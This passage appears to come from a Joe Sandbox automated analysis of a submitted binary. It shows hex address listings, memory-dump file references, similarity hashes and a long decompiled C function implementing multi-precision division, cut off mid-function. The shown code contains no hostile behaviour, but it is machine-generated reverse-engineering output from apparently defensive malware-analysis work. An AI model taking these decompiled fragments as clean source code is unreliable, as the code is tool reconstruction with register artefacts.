                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381d89
                                                                                                                                                                                                                                                                            0x00381d89
                                                                                                                                                                                                                                                                            0x00381d90
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381d90
                                                                                                                                                                                                                                                                            0x00381d87
                                                                                                                                                                                                                                                                            0x00381d7e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381dad
                                                                                                                                                                                                                                                                            0x00381db5
                                                                                                                                                                                                                                                                            0x00381dbb
                                                                                                                                                                                                                                                                            0x00381dc1
                                                                                                                                                                                                                                                                            0x00381dc5
                                                                                                                                                                                                                                                                            0x00381dc5
                                                                                                                                                                                                                                                                            0x00381dc8
                                                                                                                                                                                                                                                                            0x00381dca
                                                                                                                                                                                                                                                                            0x00381dd0
                                                                                                                                                                                                                                                                            0x00381dd7
                                                                                                                                                                                                                                                                            0x00381dda
                                                                                                                                                                                                                                                                            0x00381ddc
                                                                                                                                                                                                                                                                            0x00381df0
                                                                                                                                                                                                                                                                            0x00381df5
                                                                                                                                                                                                                                                                            0x00381d24
                                                                                                                                                                                                                                                                            0x00381d2a
                                                                                                                                                                                                                                                                            0x00381d2e
                                                                                                                                                                                                                                                                            0x00381d36
                                                                                                                                                                                                                                                                            0x00381d36
                                                                                                                                                                                                                                                                            0x00381d36
                                                                                                                                                                                                                                                                            0x00381d38
                                                                                                                                                                                                                                                                            0x00381d3b
                                                                                                                                                                                                                                                                            0x00381d3e
                                                                                                                                                                                                                                                                            0x00381d3e
                                                                                                                                                                                                                                                                            0x00381ca5
                                                                                                                                                                                                                                                                            0x00381ca8
                                                                                                                                                                                                                                                                            0x00381caa
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381cac
                                                                                                                                                                                                                                                                            0x00381cac
                                                                                                                                                                                                                                                                            0x00381cb2
                                                                                                                                                                                                                                                                            0x00381cb7
                                                                                                                                                                                                                                                                            0x00381caa
                                                                                                                                                                                                                                                                            0x00381d4b
                                                                                                                                                                                                                                                                            0x00381d56
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381c03
                                                                                                                                                                                                                                                                            0x00381bd8
                                                                                                                                                                                                                                                                            0x00381bda
                                                                                                                                                                                                                                                                            0x00381c34
                                                                                                                                                                                                                                                                            0x00381c39
                                                                                                                                                                                                                                                                            0x00381c39
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                                                            • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                            • Opcode ID: 377ab4cd4a3ac87c355c4d10ad46daeecf3b044f6e005b4197b04f8f883605eb
                                                                                                                                                                                                                                                                            • Instruction ID: 94a9857c60a5d4f3c7021e0e0e84c8960c427db8b06fd8e98a55e4c2e80ed078
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 377ab4cd4a3ac87c355c4d10ad46daeecf3b044f6e005b4197b04f8f883605eb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D412876900319ABCB21EFB9CC89EBB777CEB80314F1042A9F909DB180E6309D428B50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                                                                            			E00378560(signed int* _a4, signed int* _a8) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                                                                                                                            				signed int* _v80;
                                                                                                                                                                                                                                                                            				char _v540;
                                                                                                                                                                                                                                                                            				signed int _v544;
                                                                                                                                                                                                                                                                            				signed int _t197;
                                                                                                                                                                                                                                                                            				signed int _t198;
                                                                                                                                                                                                                                                                            				signed int* _t200;
                                                                                                                                                                                                                                                                            				signed int _t201;
                                                                                                                                                                                                                                                                            				signed int _t204;
                                                                                                                                                                                                                                                                            				signed int _t206;
                                                                                                                                                                                                                                                                            				signed int _t208;
                                                                                                                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                                                                                                                            				signed int _t213;
                                                                                                                                                                                                                                                                            				signed int _t219;
                                                                                                                                                                                                                                                                            				intOrPtr _t225;
                                                                                                                                                                                                                                                                            				void* _t228;
                                                                                                                                                                                                                                                                            				signed int _t230;
                                                                                                                                                                                                                                                                            				signed int _t247;
                                                                                                                                                                                                                                                                            				signed int _t250;
                                                                                                                                                                                                                                                                            				void* _t253;
                                                                                                                                                                                                                                                                            				signed int _t256;
                                                                                                                                                                                                                                                                            				signed int* _t262;
                                                                                                                                                                                                                                                                            				signed int _t263;
                                                                                                                                                                                                                                                                            				signed int _t264;
                                                                                                                                                                                                                                                                            				void* _t265;
                                                                                                                                                                                                                                                                            				intOrPtr* _t266;
                                                                                                                                                                                                                                                                            				signed int _t267;
                                                                                                                                                                                                                                                                            				signed int _t269;
                                                                                                                                                                                                                                                                            				signed int _t270;
                                                                                                                                                                                                                                                                            				signed int _t271;
                                                                                                                                                                                                                                                                            				signed int _t272;
                                                                                                                                                                                                                                                                            				signed int* _t274;
                                                                                                                                                                                                                                                                            				signed int* _t278;
                                                                                                                                                                                                                                                                            				signed int _t279;
                                                                                                                                                                                                                                                                            				signed int _t280;
                                                                                                                                                                                                                                                                            				intOrPtr _t282;
                                                                                                                                                                                                                                                                            				void* _t286;
                                                                                                                                                                                                                                                                            				signed char _t292;
                                                                                                                                                                                                                                                                            				signed int _t295;
                                                                                                                                                                                                                                                                            				signed int _t303;
                                                                                                                                                                                                                                                                            				signed int _t306;
                                                                                                                                                                                                                                                                            				signed int _t307;
                                                                                                                                                                                                                                                                            				signed int _t309;
                                                                                                                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                                                                                                                            				signed int _t313;
                                                                                                                                                                                                                                                                            				intOrPtr* _t314;
                                                                                                                                                                                                                                                                            				signed int _t318;
                                                                                                                                                                                                                                                                            				signed int _t322;
                                                                                                                                                                                                                                                                            				signed int* _t328;
                                                                                                                                                                                                                                                                            				signed int _t330;
                                                                                                                                                                                                                                                                            				signed int _t331;
                                                                                                                                                                                                                                                                            				signed int _t333;
                                                                                                                                                                                                                                                                            				void* _t334;
                                                                                                                                                                                                                                                                            				signed int _t336;
                                                                                                                                                                                                                                                                            				signed int _t338;
                                                                                                                                                                                                                                                                            				signed int _t341;
                                                                                                                                                                                                                                                                            				signed int _t342;
                                                                                                                                                                                                                                                                            				signed int* _t344;
                                                                                                                                                                                                                                                                            				signed int _t349;
                                                                                                                                                                                                                                                                            				signed int _t351;
                                                                                                                                                                                                                                                                            				void* _t355;
                                                                                                                                                                                                                                                                            				signed int _t359;
                                                                                                                                                                                                                                                                            				signed int _t360;
                                                                                                                                                                                                                                                                            				signed int _t362;
                                                                                                                                                                                                                                                                            				signed int* _t368;
                                                                                                                                                                                                                                                                            				signed int* _t369;
                                                                                                                                                                                                                                                                            				signed int* _t370;
                                                                                                                                                                                                                                                                            				signed int* _t373;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t262 = _a4;
                                                                                                                                                                                                                                                                            				_t197 =  *_t262;
                                                                                                                                                                                                                                                                            				if(_t197 != 0) {
                                                                                                                                                                                                                                                                            					_t328 = _a8;
                                                                                                                                                                                                                                                                            					_t267 =  *_t328;
                                                                                                                                                                                                                                                                            					__eflags = _t267;
                                                                                                                                                                                                                                                                            					if(_t267 != 0) {
                                                                                                                                                                                                                                                                            						_t349 = _t197 - 1;
                                                                                                                                                                                                                                                                            						_t198 = _t267 - 1;
                                                                                                                                                                                                                                                                            						_v16 = _t349;
                                                                                                                                                                                                                                                                            						__eflags = _t198;
                                                                                                                                                                                                                                                                            						if(_t198 != 0) {
                                                                                                                                                                                                                                                                            							__eflags = _t198 - _t349;
                                                                                                                                                                                                                                                                            							if(_t198 > _t349) {
                                                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t306 = _t349 - _t198;
                                                                                                                                                                                                                                                                            								_v60 = _t198 + 1;
                                                                                                                                                                                                                                                                            								_t269 = _t349;
                                                                                                                                                                                                                                                                            								__eflags = _t349 - _t306;
                                                                                                                                                                                                                                                                            								if(_t349 < _t306) {
                                                                                                                                                                                                                                                                            									L21:
                                                                                                                                                                                                                                                                            									_t306 = _t306 + 1;
                                                                                                                                                                                                                                                                            									__eflags = _t306;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_t368 =  &(_t262[_t349 + 1]);
                                                                                                                                                                                                                                                                            									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                                                                                                                                                                                                                                            									__eflags = _t341;
                                                                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                                                                            										__eflags =  *_t341 -  *_t368;
                                                                                                                                                                                                                                                                            										if( *_t341 !=  *_t368) {
                                                                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_t269 = _t269 - 1;
                                                                                                                                                                                                                                                                            										_t341 = _t341 - 4;
                                                                                                                                                                                                                                                                            										_t368 = _t368 - 4;
                                                                                                                                                                                                                                                                            										__eflags = _t269 - _t306;
                                                                                                                                                                                                                                                                            										if(_t269 >= _t306) {
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											goto L21;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L22;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t369 = _a8;
                                                                                                                                                                                                                                                                            									_t54 = (_t269 - _t306) * 4; // 0x8b00ffff
                                                                                                                                                                                                                                                                            									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                                                                                                                                                                                                                                            									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								L22:
                                                                                                                                                                                                                                                                            								__eflags = _t306;
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									_t330 = _v60;
                                                                                                                                                                                                                                                                            									_t200 = _a8;
                                                                                                                                                                                                                                                                            									_t351 =  *(_t200 + _t330 * 4);
                                                                                                                                                                                                                                                                            									_t64 = _t330 * 4; // 0x220
                                                                                                                                                                                                                                                                            									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                                                                                                                                                                                                                                                                            									_v36 = _t201;
                                                                                                                                                                                                                                                                            									asm("bsr eax, esi");
                                                                                                                                                                                                                                                                            									_v56 = _t351;
                                                                                                                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                                                                                                                            										_t270 = 0x20;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t270 = 0x1f - _t201;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v40 = _t270;
                                                                                                                                                                                                                                                                            									_v64 = 0x20 - _t270;
                                                                                                                                                                                                                                                                            									__eflags = _t270;
                                                                                                                                                                                                                                                                            									if(_t270 != 0) {
                                                                                                                                                                                                                                                                            										_t292 = _v40;
                                                                                                                                                                                                                                                                            										_v36 = _v36 << _t292;
                                                                                                                                                                                                                                                                            										_v56 = _t351 << _t292 | _v36 >> _v64;
                                                                                                                                                                                                                                                                            										__eflags = _t330 - 2;
                                                                                                                                                                                                                                                                            										if(_t330 > 2) {
                                                                                                                                                                                                                                                                            											_t79 = _t330 * 4; // 0xe850ffff
                                                                                                                                                                                                                                                                            											_t81 =  &_v36;
                                                                                                                                                                                                                                                                            											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                                                                                                                                                                                                                                                                            											__eflags =  *_t81;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v76 = 0;
                                                                                                                                                                                                                                                                            									_t307 = _t306 + 0xffffffff;
                                                                                                                                                                                                                                                                            									__eflags = _t307;
                                                                                                                                                                                                                                                                            									_v32 = _t307;
                                                                                                                                                                                                                                                                            									if(_t307 < 0) {
                                                                                                                                                                                                                                                                            										_t331 = 0;
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v20 =  &(( &(_t262[1]))[_t307]);
                                                                                                                                                                                                                                                                            										_t206 = _t307 + _t330;
                                                                                                                                                                                                                                                                            										_v12 = _t206;
                                                                                                                                                                                                                                                                            										_t278 = _t262 - 4 + _t206 * 4;
                                                                                                                                                                                                                                                                            										_v80 = _t278;
                                                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                                                            											__eflags = _t206 - _v16;
                                                                                                                                                                                                                                                                            											if(_t206 > _v16) {
                                                                                                                                                                                                                                                                            												_t207 = 0;
                                                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												_t207 = _t278[2];
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											__eflags = _v40;
                                                                                                                                                                                                                                                                            											_t311 = _t278[1];
                                                                                                                                                                                                                                                                            											_t279 =  *_t278;
                                                                                                                                                                                                                                                                            											_v52 = _t207;
                                                                                                                                                                                                                                                                            											_v44 = 0;
                                                                                                                                                                                                                                                                            											_v8 = _t207;
                                                                                                                                                                                                                                                                            											_v24 = _t279;
                                                                                                                                                                                                                                                                            											if(_v40 > 0) {
                                                                                                                                                                                                                                                                            												_t318 = _v8;
                                                                                                                                                                                                                                                                            												_t336 = _t279 >> _v64;
                                                                                                                                                                                                                                                                            												_t230 = E0037DE90(_t311, _v40, _t318);
                                                                                                                                                                                                                                                                            												_t279 = _v40;
                                                                                                                                                                                                                                                                            												_t207 = _t318;
                                                                                                                                                                                                                                                                            												_t311 = _t336 | _t230;
                                                                                                                                                                                                                                                                            												_t359 = _v24 << _t279;
                                                                                                                                                                                                                                                                            												__eflags = _v12 - 3;
                                                                                                                                                                                                                                                                            												_v8 = _t318;
                                                                                                                                                                                                                                                                            												_v24 = _t359;
                                                                                                                                                                                                                                                                            												if(_v12 >= 3) {
                                                                                                                                                                                                                                                                            													_t279 = _v64;
                                                                                                                                                                                                                                                                            													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                                                                                                                                                                                                                                                                            													__eflags = _t360;
                                                                                                                                                                                                                                                                            													_t207 = _v8;
                                                                                                                                                                                                                                                                            													_v24 = _t360;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t208 = E0037DEB0(_t311, _t207, _v56, 0);
                                                                                                                                                                                                                                                                            											_v44 = _t262;
                                                                                                                                                                                                                                                                            											_t263 = _t208;
                                                                                                                                                                                                                                                                            											_v44 = 0;
                                                                                                                                                                                                                                                                            											_t209 = _t311;
                                                                                                                                                                                                                                                                            											_v8 = _t263;
                                                                                                                                                                                                                                                                            											_v28 = _t209;
                                                                                                                                                                                                                                                                            											_t333 = _t279;
                                                                                                                                                                                                                                                                            											_v72 = _t263;
                                                                                                                                                                                                                                                                            											_v68 = _t209;
                                                                                                                                                                                                                                                                            											__eflags = _t209;
                                                                                                                                                                                                                                                                            											if(_t209 != 0) {
                                                                                                                                                                                                                                                                            												L40:
                                                                                                                                                                                                                                                                            												_t264 = _t263 + 1;
                                                                                                                                                                                                                                                                            												asm("adc eax, 0xffffffff");
                                                                                                                                                                                                                                                                            												_t333 = _t333 + E0037DE50(_t264, _t209, _v56, 0);
                                                                                                                                                                                                                                                                            												asm("adc esi, edx");
                                                                                                                                                                                                                                                                            												_t263 = _t264 | 0xffffffff;
                                                                                                                                                                                                                                                                            												_t209 = 0;
                                                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                                                            												_v44 = 0;
                                                                                                                                                                                                                                                                            												_v8 = _t263;
                                                                                                                                                                                                                                                                            												_v72 = _t263;
                                                                                                                                                                                                                                                                            												_v28 = 0;
                                                                                                                                                                                                                                                                            												_v68 = 0;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												__eflags = _t263 - 0xffffffff;
                                                                                                                                                                                                                                                                            												if(_t263 > 0xffffffff) {
                                                                                                                                                                                                                                                                            													goto L40;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                                                                                                                            											if(0 <= 0) {
                                                                                                                                                                                                                                                                            												if(0 < 0) {
                                                                                                                                                                                                                                                                            													goto L44;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													__eflags = _t333 - 0xffffffff;
                                                                                                                                                                                                                                                                            													if(_t333 <= 0xffffffff) {
                                                                                                                                                                                                                                                                            														while(1) {
                                                                                                                                                                                                                                                                            															L44:
                                                                                                                                                                                                                                                                            															_v8 = _v24;
                                                                                                                                                                                                                                                                            															_t228 = E0037DE50(_v36, 0, _t263, _t209);
                                                                                                                                                                                                                                                                            															__eflags = _t311 - _t333;
                                                                                                                                                                                                                                                                            															if(__eflags < 0) {
                                                                                                                                                                                                                                                                            																break;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															if(__eflags > 0) {
                                                                                                                                                                                                                                                                            																L47:
                                                                                                                                                                                                                                                                            																_t209 = _v28;
                                                                                                                                                                                                                                                                            																_t263 = _t263 + 0xffffffff;
                                                                                                                                                                                                                                                                            																_v72 = _t263;
                                                                                                                                                                                                                                                                            																asm("adc eax, 0xffffffff");
                                                                                                                                                                                                                                                                            																_t333 = _t333 + _v56;
                                                                                                                                                                                                                                                                            																__eflags = _t333;
                                                                                                                                                                                                                                                                            																_v28 = _t209;
                                                                                                                                                                                                                                                                            																asm("adc dword [ebp-0x28], 0x0");
                                                                                                                                                                                                                                                                            																_v68 = _t209;
                                                                                                                                                                                                                                                                            																if(_t333 == 0) {
                                                                                                                                                                                                                                                                            																	__eflags = _t333 - 0xffffffff;
                                                                                                                                                                                                                                                                            																	if(_t333 <= 0xffffffff) {
                                                                                                                                                                                                                                                                            																		continue;
                                                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                            																__eflags = _t228 - _v8;
                                                                                                                                                                                                                                                                            																if(_t228 <= _v8) {
                                                                                                                                                                                                                                                                            																	break;
                                                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                                                            																	goto L47;
                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															L51:
                                                                                                                                                                                                                                                                            															_v8 = _t263;
                                                                                                                                                                                                                                                                            															goto L52;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														_t209 = _v28;
                                                                                                                                                                                                                                                                            														goto L51;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											L52:
                                                                                                                                                                                                                                                                            											__eflags = _t209;
                                                                                                                                                                                                                                                                            											if(_t209 != 0) {
                                                                                                                                                                                                                                                                            												L54:
                                                                                                                                                                                                                                                                            												_t280 = _v60;
                                                                                                                                                                                                                                                                            												_t334 = 0;
                                                                                                                                                                                                                                                                            												_t355 = 0;
                                                                                                                                                                                                                                                                            												__eflags = _t280;
                                                                                                                                                                                                                                                                            												if(_t280 != 0) {
                                                                                                                                                                                                                                                                            													_t266 = _v20;
                                                                                                                                                                                                                                                                            													_t219 =  &(_a8[1]);
                                                                                                                                                                                                                                                                            													__eflags = _t219;
                                                                                                                                                                                                                                                                            													_v24 = _t219;
                                                                                                                                                                                                                                                                            													_v16 = _t280;
                                                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                                                            														_v44 =  *_t219;
                                                                                                                                                                                                                                                                            														_t225 =  *_t266;
                                                                                                                                                                                                                                                                            														_t286 = _t334 + _v72 * _v44;
                                                                                                                                                                                                                                                                            														asm("adc esi, edx");
                                                                                                                                                                                                                                                                            														_t334 = _t355;
                                                                                                                                                                                                                                                                            														_t355 = 0;
                                                                                                                                                                                                                                                                            														__eflags = _t225 - _t286;
                                                                                                                                                                                                                                                                            														if(_t225 < _t286) {
                                                                                                                                                                                                                                                                            															_t334 = _t334 + 1;
                                                                                                                                                                                                                                                                            															asm("adc esi, esi");
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														 *_t266 = _t225 - _t286;
                                                                                                                                                                                                                                                                            														_t266 = _t266 + 4;
                                                                                                                                                                                                                                                                            														_t219 = _v24 + 4;
                                                                                                                                                                                                                                                                            														_t164 =  &_v16;
                                                                                                                                                                                                                                                                            														 *_t164 = _v16 - 1;
                                                                                                                                                                                                                                                                            														__eflags =  *_t164;
                                                                                                                                                                                                                                                                            														_v24 = _t219;
                                                                                                                                                                                                                                                                            													} while ( *_t164 != 0);
                                                                                                                                                                                                                                                                            													_t263 = _v8;
                                                                                                                                                                                                                                                                            													_t280 = _v60;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												__eflags = 0 - _t355;
                                                                                                                                                                                                                                                                            												if(__eflags <= 0) {
                                                                                                                                                                                                                                                                            													if(__eflags < 0) {
                                                                                                                                                                                                                                                                            														L63:
                                                                                                                                                                                                                                                                            														__eflags = _t280;
                                                                                                                                                                                                                                                                            														if(_t280 != 0) {
                                                                                                                                                                                                                                                                            															_t338 = _t280;
                                                                                                                                                                                                                                                                            															_t314 = _v20;
                                                                                                                                                                                                                                                                            															_t362 =  &(_a8[1]);
                                                                                                                                                                                                                                                                            															__eflags = _t362;
                                                                                                                                                                                                                                                                            															_t265 = 0;
                                                                                                                                                                                                                                                                            															do {
                                                                                                                                                                                                                                                                            																_t282 =  *_t314;
                                                                                                                                                                                                                                                                            																_t172 = _t362 + 4; // 0xfa8cbd83
                                                                                                                                                                                                                                                                            																_t362 = _t172;
                                                                                                                                                                                                                                                                            																_t314 = _t314 + 4;
                                                                                                                                                                                                                                                                            																asm("adc eax, eax");
                                                                                                                                                                                                                                                                            																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                                                                                                                                                                                                                                                                            																asm("adc eax, 0x0");
                                                                                                                                                                                                                                                                            																_t265 = 0;
                                                                                                                                                                                                                                                                            																_t338 = _t338 - 1;
                                                                                                                                                                                                                                                                            																__eflags = _t338;
                                                                                                                                                                                                                                                                            															} while (_t338 != 0);
                                                                                                                                                                                                                                                                            															_t263 = _v8;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														_t263 = _t263 + 0xffffffff;
                                                                                                                                                                                                                                                                            														asm("adc dword [ebp-0x18], 0xffffffff");
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            														__eflags = _v52 - _t334;
                                                                                                                                                                                                                                                                            														if(_v52 < _t334) {
                                                                                                                                                                                                                                                                            															goto L63;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												_t213 = _v12 - 1;
                                                                                                                                                                                                                                                                            												__eflags = _t213;
                                                                                                                                                                                                                                                                            												_v16 = _t213;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												__eflags = _t263;
                                                                                                                                                                                                                                                                            												if(_t263 != 0) {
                                                                                                                                                                                                                                                                            													goto L54;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t331 = 0 + _t263;
                                                                                                                                                                                                                                                                            											asm("adc esi, 0x0");
                                                                                                                                                                                                                                                                            											_v20 = _v20 - 4;
                                                                                                                                                                                                                                                                            											_t313 = _v32 - 1;
                                                                                                                                                                                                                                                                            											_t262 = _a4;
                                                                                                                                                                                                                                                                            											_t278 = _v80 - 4;
                                                                                                                                                                                                                                                                            											_t206 = _v12 - 1;
                                                                                                                                                                                                                                                                            											_v76 = _t331;
                                                                                                                                                                                                                                                                            											_v32 = _t313;
                                                                                                                                                                                                                                                                            											_v80 = _t278;
                                                                                                                                                                                                                                                                            											_v12 = _t206;
                                                                                                                                                                                                                                                                            											__eflags = _t313;
                                                                                                                                                                                                                                                                            										} while (_t313 >= 0);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t309 = _v16 + 1;
                                                                                                                                                                                                                                                                            									_t204 = _t309;
                                                                                                                                                                                                                                                                            									__eflags = _t204 -  *_t262;
                                                                                                                                                                                                                                                                            									if(_t204 <  *_t262) {
                                                                                                                                                                                                                                                                            										_t191 = _t204 + 1; // 0x378342
                                                                                                                                                                                                                                                                            										_t274 =  &(_t262[_t191]);
                                                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                                                            											 *_t274 = 0;
                                                                                                                                                                                                                                                                            											_t194 =  &(_t274[1]); // 0x59d88b00
                                                                                                                                                                                                                                                                            											_t274 = _t194;
                                                                                                                                                                                                                                                                            											_t204 = _t204 + 1;
                                                                                                                                                                                                                                                                            											__eflags = _t204 -  *_t262;
                                                                                                                                                                                                                                                                            										} while (_t204 <  *_t262);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									 *_t262 = _t309;
                                                                                                                                                                                                                                                                            									__eflags = _t309;
                                                                                                                                                                                                                                                                            									if(_t309 != 0) {
                                                                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                                                                            											_t271 =  *_t262;
                                                                                                                                                                                                                                                                            											__eflags = _t262[_t271];
                                                                                                                                                                                                                                                                            											if(_t262[_t271] != 0) {
                                                                                                                                                                                                                                                                            												goto L78;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t272 = _t271 + 0xffffffff;
                                                                                                                                                                                                                                                                            											__eflags = _t272;
                                                                                                                                                                                                                                                                            											 *_t262 = _t272;
                                                                                                                                                                                                                                                                            											if(_t272 != 0) {
                                                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											goto L78;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									L78:
                                                                                                                                                                                                                                                                            									return _t331;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t6 =  &(_t328[1]); // 0x8b00ffff
                                                                                                                                                                                                                                                                            							_t295 =  *_t6;
                                                                                                                                                                                                                                                                            							_v44 = _t295;
                                                                                                                                                                                                                                                                            							__eflags = _t295 - 1;
                                                                                                                                                                                                                                                                            							if(_t295 != 1) {
                                                                                                                                                                                                                                                                            								__eflags = _t349;
                                                                                                                                                                                                                                                                            								if(_t349 != 0) {
                                                                                                                                                                                                                                                                            									_t342 = 0;
